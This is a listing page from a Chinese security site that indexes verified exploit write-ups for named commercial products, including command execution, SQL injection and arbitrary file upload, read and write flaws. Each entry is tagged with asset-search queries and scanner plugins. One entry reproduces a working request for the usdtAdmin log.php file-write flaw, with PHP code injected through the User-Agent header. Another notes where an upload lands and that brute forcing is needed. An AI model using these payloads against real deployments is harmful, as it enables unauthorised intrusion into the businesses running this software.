通知图标

欢迎访问秃兔安全

dreamer292_秃兔安全_第8页
【通用】苹果iOS签名IPA网站系统V2存在前台Sign.php任意命令执行漏洞_秃兔安全
【通用】Optilink 管理系统 upgrade.php  rce_秃兔安全

【通用】Optilink 管理系统 upgrade.php rce

fofa语句yakit插件 uuid pocyaml已验证   
【通用】装盟科技-家装ERP管理系统  14处SQL注入漏洞_秃兔安全
【通用】致远互联FE协作办公平台loadInforData.jsp存在SQL注入漏洞_秃兔安全
【通用】usdtAdmin收款管理系统log.php 任意文件写入_秃兔安全

【通用】usdtAdmin收款管理系统log.php 任意文件写入

fofa语句yakit插件 uuidpocPOST /log.php?c=1&name=123.php HTTP/1.1 Host: xxxx User-Agent: <?php echo 66666;@unlink(__FILE__);?> content=MTIzNDU2 #具体路径会回显。另外注意ua...
【通用】 妈妈宝盒-ERP UploadHandler存在任意文件读取漏洞_秃兔安全
【2025特殊通用】亿赛通电子文档 getMultiplekey sqli_秃兔安全
【通用】BigAnt-Admin uploadMultipleFile   任意文件上传_秃兔安全

【通用】BigAnt-Admin uploadMultipleFile 任意文件上传

fofa语句yakit插件 uuidpocyaml已验证   
【通用】安恒安全网关 net_dynamic_pop_adv_submit 文件上传漏洞_秃兔安全

【通用】安恒安全网关 net_dynamic_pop_adv_submit 文件上传漏洞

fofayakit插件 uuidpocyaml注:文件会以时间戳md5的方式存储在/adv/image/md5(时间戳).php,所以前面只能验证是否存在可以上传的点具体上传成功的数据包需要爆破一把梭脚本已验证    
【通用】朗速ERP FileUploadApi.ashx 存在任意文件上传_秃兔安全

秃兔音乐盒